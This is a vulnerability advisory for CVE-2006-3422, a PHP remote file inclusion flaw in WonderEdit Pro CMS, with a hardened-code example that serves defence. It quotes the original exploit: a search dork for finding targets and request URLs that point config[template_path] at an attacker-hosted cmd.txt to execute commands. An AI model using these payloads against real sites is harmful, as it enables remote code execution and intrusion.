WonderEdit Pro 'User_Bottom.PHP' Remote File Include Vulnerability

Vulnerability ID: 1110561    Vulnerability type: Input validation
Published: 2006-07-04    Updated: 2006-07-19
CVE: CVE-2006-3422    CNNVD-ID: CNNVD-200607-050
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1982
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-050
|Vulnerability details
WonderEdit Pro CMS contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via the config[template_path] parameter of user_bottom.php, which is used by several templates, including (1) rwb (template/rwb/user_bottom.php), (2) gwb (template/gwb/user_bottom.php), (3) blues, (4) bluwhi, and (5) grns.
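The details above describe a classic include-path injection. As an added example (not WonderEdit Pro's own code, which does not appear on this page), the PHP below shows a hypothetical reconstruction of the vulnerable include pattern beside a hardened version that selects the template from a fixed allowlist and confines the resolved path; the names $config['template_path'], TEMPLATE_ROOT, ALLOWED_TEMPLATES and bottom.inc.php are assumptions.

```php
<?php
// Added example, not WonderEdit Pro's code: a hypothetical reconstruction of the
// include pattern behind CVE-2006-3422 next to one way to harden it.
// Assumed: $config['template_path'], TEMPLATE_ROOT, ALLOWED_TEMPLATES, bottom.inc.php.

// Vulnerable pattern. With register_globals on (which the config[template_path]
// query parameter on this page implies) and allow_url_fopen/allow_url_include on,
// a request that sets config[template_path] to a remote URL makes PHP fetch and
// execute that file. allow_url_include=Off in php.ini is only a second layer.
function render_bottom_vulnerable(array $config): void
{
    include $config['template_path'] . '/bottom.inc.php';
}

// Hardened version: the request supplies only a template *name*, validated
// against an allowlist; the path is built server-side and the resolved path is
// checked to remain under TEMPLATE_ROOT. No user input reaches the include path.
$templateRoot = realpath(__DIR__ . '/template');
if ($templateRoot === false) {
    exit('template directory missing');
}
define('TEMPLATE_ROOT', $templateRoot);
const ALLOWED_TEMPLATES = ['rwb', 'gwb', 'blues', 'bluwhi', 'grns'];

function resolve_template_file(string $template, string $file): ?string
{
    if (!in_array($template, ALLOWED_TEMPLATES, true)) {
        return null;                                  // unknown template name
    }
    // realpath() collapses any "../" and returns false for a missing file, so
    // the prefix check below cannot be bypassed by traversal.
    $candidate = realpath(TEMPLATE_ROOT . '/' . $template . '/' . $file);
    if ($candidate === false || strpos($candidate, TEMPLATE_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

function render_bottom_hardened(string $template): void
{
    $path = resolve_template_file($template, 'bottom.inc.php');
    if ($path === null) {
        http_response_code(400);
        exit('invalid template');
    }
    include $path;
}

// The request names a template; it never supplies a path or URL.
render_bottom_hardened($_GET['template'] ?? 'rwb');
```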
|Vulnerability EXP
--------------------------------------------------------------------------------

Title : WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Web Site CMS
version : pro version
Description: this is the default CMS for all hosting at Wonder hosting (http://www.12wonderhosting.com/), maybe :)
URL : http://www.wonderedit.com

-----------------------------------------------------------------------------


dork        : "powered by WonderEdit Pro"

Exploit     :  

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls

------------------------------------------------------------------------------

This works for all templates in WonderEdit Pro CMS; use "rwb" or "gwb" for the default attack. Other templates like
"blues", "bluwhi", "grns", and others are vulnerable too.

------------------------------------------------------------------------------


greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-04]
|References

Source: XF
Name: wonderedit-templatepath-file-include(27536)
Link: http://xforce.iss.net/xforce/xfdb/27536
Source: BID
Name: 18821
Link: http://www.securityfocus.com/bid/18821
Source: MILW0RM
Name: 1982
Link: http://www.milw0rm.com/exploits/1982
Source: MILW0RM
Name: 1982
Link: http://milw0rm.com/exploits/1982